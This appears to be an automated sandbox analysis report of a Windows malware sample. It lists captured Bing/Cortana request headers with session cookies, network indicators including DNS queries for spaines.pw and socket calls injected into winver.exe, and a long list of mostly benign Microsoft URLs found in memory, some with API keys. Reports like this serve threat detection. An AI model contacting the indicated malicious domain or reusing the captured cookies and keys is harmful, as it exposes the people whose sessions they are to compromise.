X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
X-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1
X-Device-isOptin: false
X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
X-Device-OSSKU: 48
X-Device-Touch: false
X-DeviceID: 01000A4109000CC6
X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-t
X-MSEdge-ExternalExpType: JointCoord
X-PositionerType: Desktop
X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
X-Search-CortanaAvailableCapabilities: None
X-Search-SafeSearch: Moderate
X-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard Time
X-UserAgeClass: Unknown
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Host: www.bing.com
Content-Length: 2232
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32 (20 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
Source: C:\Windows\SysWOW64\winver.exe | Code function: 2_2_047E2F88 send, send, recv, closesocket
Source: unknown | DNS traffic detected: queries for: spaines.pw
Source: unknown | HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1 to www.bing.com (the same Cortana request, with identical headers and cookies, as listed above under global traffic)
Source: explorer.exe, 00000003.00000000.1715884676.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000006.00000002.3025882268.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3026550314.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1795301212.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: explorer.exe, 00000003.00000000.1715884676.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000006.00000002.3025882268.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3026550314.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1795301212.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: SearchApp.exe, 0000000B.00000000.1827278453.0000024B41348000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1840873224.0000024B4247F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 00000003.00000000.1715884676.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000006.00000002.3025882268.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3026550314.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1795301212.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: explorer.exe, 00000003.00000000.1715884676.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3025882268.0000019E29FC7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3026550314.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1795301212.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: SearchApp.exe, 0000000B.00000000.1827278453.0000024B41348000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1840873224.0000024B4247F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: SearchApp.exe, 0000000B.00000000.1827278453.0000024B41348000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1840873224.0000024B4247F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: SearchApp.exe, 0000000B.00000000.1882247398.0000024B54FDE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schema.skype.com/Mention
Source: explorer.exe, 00000003.00000000.1714711719.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1716586529.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1715110391.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000A.00000002.3035088754.000001ECFC470000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: svchost.exe, 00000005.00000000.1792057093.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2991250120.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000005.00000000.1792057093.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2991250120.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com
Source: explorer.exe, 00000003.00000002.3110068499.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1717782304.000000000C893000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.comt
Source: SearchApp.exe, 0000000B.00000000.1840976922.0000024B4248E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: explorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000003.00000000.1713964202.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000000.1715884676.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
Source: SearchApp.exe, 0000000B.00000000.1824776823.0000024340CDC000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5
Source: explorer.exe, 00000003.00000000.1715884676.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000003.00000002.3012213853.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1712577983.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713118694.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2977124293.0000000001240000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000003.00000002.3084368988.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1715884676.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1715884676.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3084368988.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: SearchApp.exe, 0000000B.00000000.1820370567.0000024339C3F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comC
            Source: explorer.exe, 00000003.00000002.3084368988.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1715884676.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
            Source: svchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
            Source: svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
            Source: svchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.comer
            Source: svchost.exe, 00000005.00000000.1792028423.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.coms
            Source: explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
            Source: explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
            Source: svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000006.00000002.3014615006.0000019E297F1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.1794985921.0000019E297F1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-GB
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
            Source: explorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
            Source: explorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: StartMenuExperienceHost.exe, 00000009.00000000.1801470015.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2985059501.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comcp
            Source: SearchApp.exe, 0000000B.00000000.1878822933.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfills
            Source: svchost.exe, 00000005.00000002.2989605632.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
            Source: explorer.exe, 00000003.00000002.3050739275.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1713964202.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: svchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
            Source: svchost.exe, 00000005.00000000.1792087388.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2993202471.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1840976922.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
            Source: svchost.exe, 00000005.00000002.2994520970.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1792111945.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
            Source: SearchApp.exe, 0000000B.00000000.1848683308.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api
            Source: StartMenuExperienceHost.exe, 00000009.00000000.1801563347.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2989471561.000001B9814D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: explorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
            Source: SearchApp.exe, 0000000B.00000000.1836526341.0000024B420F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/owa
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWrite
            Source: SearchApp.exe, 0000000B.00000000.1888579626.0000024B5549B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/owa
            Source: SearchApp.exe, 0000000B.00000000.1879521352.0000024B54E44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/
            Source: explorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
            Source: StartMenuExperienceHost.exe, 00000009.00000000.1801470015.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2985059501.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comxee
            Source: SearchApp.exe, 0000000B.00000000.1848016538.0000024B4434A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rafd.https://r.a
            Source: SearchApp.exe, 0000000B.00000000.1848016538.0000024B4434A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://raka.rms_noco-VK
            Source: SearchApp.exe, 0000000B.00000000.1878822933.0000024B54DA0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
            Source: SearchApp.exe, 0000000B.00000000.1834242505.0000024B41E30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://searchapp.bundleassets.example/desktop/2.html
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
            Source: SearchApp.exe, 0000000B.00000000.1887670634.0000024B5542F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1888726531.0000024B554A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/api/v2.0/Users(
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/imageB2/v1.0/users/
            Source: SearchApp.exe, 0000000B.00000000.1848683308.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/api/v2.0/Users(
            Source: SearchApp.exe, 0000000B.00000000.1825933991.0000024341100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/imageB2/v1.0/users/
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000003.00000002.3110068499.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1717782304.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
            Source: explorer.exe, 00000003.00000000.1717782304.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3110068499.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1801470015.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2985059501.000001B98144E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: SearchApp.exe, 0000000B.00000000.1840873224.0000024B4247F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
            Source: explorer.exe, 00000003.00000000.1713964202.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3050739275.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
